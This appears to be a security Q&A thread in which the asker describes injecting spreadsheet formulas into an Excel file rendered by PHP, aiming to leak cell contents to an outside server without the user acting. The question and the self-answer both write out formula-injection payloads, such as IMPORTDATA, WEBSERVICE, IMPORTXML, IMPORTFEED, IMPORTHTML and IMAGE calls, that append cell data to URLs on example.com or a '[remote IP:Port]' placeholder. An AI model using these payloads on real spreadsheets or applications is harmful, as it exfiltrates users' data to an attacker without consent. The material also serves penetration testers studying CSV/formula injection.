4

I need to extract data from inside an Excel fille using Excel 2007 functions.

The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (which I managed to inject in the file cells) in order to make the user automatically load an image, web path or make a DNS request.

Until now I have tried the followings but they failed because the Excel file is rendered in PHP with Excel 2007 functions:

  • =IMPORTDATA(CONCATENATE("https://example.com/", C2))
  • =WEBSERVICE(CONCATENATE("https://example.com/", C2))

I have successfully injected:

  • =HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")

But in this manner I have to trick a user to open the link by itself (not impossible, but no fun :D).

Anders
  • 64,406
  • 24
  • 178
  • 215
Lucian Nitescu
  • 1,802
  • 1
  • 13
  • 27

1 Answers1

1

After a few trials and errors, I have manage to extract data but also I find the following article one of the most comprehensive reaource for data exfiltration using excel formula:

https://www.notsosecure.com/data-exfiltration-formula-injection/

CONCATENATE: Appends strings to one another.

=CONCATENATE(A2:E2)

IMPORTXML: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.

=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

IMPORTFEED: Imports a RSS or ATOM feed.

=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))

IMPORTHTML: Imports data from a table or list within an HTML page.

=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

IMPORTRANGE: Imports a range of cells from a specified spreadsheet.

=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

IMAGE: Inserts an image into a cell.

=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")

Lucian Nitescu
  • 1,802
  • 1
  • 13
  • 27